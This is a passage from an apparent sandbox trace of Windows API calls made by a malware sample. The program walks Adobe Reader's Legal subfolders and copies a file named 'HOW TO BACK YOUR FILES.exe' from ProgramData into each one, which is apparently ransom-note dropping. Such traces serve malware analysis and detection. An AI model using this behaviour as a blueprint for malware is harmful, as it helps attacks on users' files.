lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d81e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f722a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f722a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.174] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.174] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.174] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL" [0061.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2108 | out: hHeap=0x2b0000) returned 1 [0061.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0061.174] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL") returned 57 [0061.174] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL" [0061.174] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.174] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.179] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.179] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a76e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f722a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f722a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.179] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.179] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.179] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR" [0061.179] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2088 | out: hHeap=0x2b0000) returned 1 [0061.179] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0061.179] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR") returned 57 [0061.179] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR" [0061.180] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.180] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.186] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.186] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f98400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f98400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.186] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.186] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.186] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD" [0061.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2008 | out: hHeap=0x2b0000) returned 1 [0061.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0061.187] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD") returned 57 [0061.187] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD" [0061.187] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.187] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.192] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.192] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81dce140, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55f98400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55f98400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.192] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.192] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.192] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR" [0061.192] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1f88 | out: hHeap=0x2b0000) returned 1 [0061.192] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0061.192] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR") returned 57 [0061.192] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR" [0061.192] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.192] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.198] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.198] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d81e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55fbe560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55fbe560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.198] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.198] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.199] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN" [0061.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1f08 | out: hHeap=0x2b0000) returned 1 [0061.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0061.199] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN") returned 57 [0061.199] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN" [0061.199] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.199] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.202] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.202] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81dce140, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55fbe560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55fbe560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.202] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.202] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.202] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA" [0061.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1e88 | out: hHeap=0x2b0000) returned 1 [0061.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0061.203] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA") returned 57 [0061.203] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA" [0061.203] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.203] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.206] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.206] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55fbe560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55fbe560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.206] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.206] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.206] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN" [0061.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1e08 | out: hHeap=0x2b0000) returned 1 [0061.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0061.206] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN") returned 57 [0061.206] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN" [0061.206] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.206] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.211] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.211] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a76e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55fe46c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55fe46c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.211] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.211] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.212] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV" [0061.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1d88 | out: hHeap=0x2b0000) returned 1 [0061.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0061.212] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV") returned 57 [0061.212] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV" [0061.212] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.212] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.216] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.216] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81ce9900, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55fe46c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55fe46c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.217] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.217] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.217] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA" [0061.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1d08 | out: hHeap=0x2b0000) returned 1 [0061.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0061.217] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA") returned 57 [0061.217] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA" [0061.217] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.217] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.222] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.222] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55fe46c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55fe46c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.222] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.222] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.222] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ" [0061.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1c88 | out: hHeap=0x2b0000) returned 1 [0061.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0061.222] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ") returned 57 [0061.222] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ" [0061.222] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.222] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.231] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.231] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81efec40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5600a820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5600a820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.231] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.231] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.231] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP" [0061.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1c08 | out: hHeap=0x2b0000) returned 1 [0061.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0061.231] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP") returned 57 [0061.231] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP" [0061.231] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.231] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.236] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.236] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\*", lpFindFileData=0x2e2e610 